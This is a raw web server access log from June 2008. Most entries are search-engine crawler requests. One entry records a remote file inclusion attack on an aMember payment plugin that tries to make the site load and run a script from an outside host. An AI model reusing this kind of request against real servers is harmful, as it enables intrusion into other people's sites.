74.6.21.31 - - [05/Jun/2008:03:14:36 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.221 - - [05/Jun/2008:03:14:37 +0200] "GET /world.html HTTP/1.0" 200 16295 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.28.94 - - [05/Jun/2008:03:27:10 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.225 - - [05/Jun/2008:03:27:11 +0200] "GET /logz_old.html HTTP/1.0" 404 2748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.211.160 - - [05/Jun/2008:03:45:31 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.160 - - [05/Jun/2008:03:45:32 +0200] "GET /3dsf3/sendi/sendisendi.html HTTP/1.1" 200 5118 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.195.37.109 - - [05/Jun/2008:03:45:32 +0200] "GET /frame-menu.html HTTP/1.0" 200 10492 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.101 - - [05/Jun/2008:04:04:37 +0200] "GET /restate_copy.html HTTP/1.0" 200 97631 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.101 - - [05/Jun/2008:04:23:27 +0200] "GET /neon/girlz2.html HTTP/1.0" 200 2937 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
82.99.30.67 - - [05/Jun/2008:04:23:49 +0200] "GET /neon/clicktoenter.gif HTTP/1.0" 200 16302 "http://www.munax.com/referer.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
67.195.37.109 - - [05/Jun/2008:04:32:01 +0200] "GET /rez/327.mp3 HTTP/1.0" 200 2771948 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.101 - - [05/Jun/2008:04:36:07 +0200] "GET /zampa/ HTTP/1.0" 200 7153 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [05/Jun/2008:04:37:41 +0200] "GET /games/virtualcop/ HTTP/1.0" 403 1223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.31 - - [05/Jun/2008:05:04:32 +0200] "GET /f-net.html HTTP/1.0" 200 9913 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.47 - - [05/Jun/2008:05:08:22 +0200] "GET /neon/code.html HTTP/1.0" 200 1109 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
82.237.212.168 - - [05/Jun/2008:05:19:30 +0200] "GET http://various-euro.com/amember/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://www.freewebtown.com/gh0stdog/404.txt? HTTP/1.0" 404 2748 "http://various-euro.com/amember/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://www.freewebtown.com/gh0stdog/404.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
67.195.51.216 - - [05/Jun/2008:05:24:16 +0200] "GET /DgH/rampe/ HTTP/1.0" 200 2056 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
